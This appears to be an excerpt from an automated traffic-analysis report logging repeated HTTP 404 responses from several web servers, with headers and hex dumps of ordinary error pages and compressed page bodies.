        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:29 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 66 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 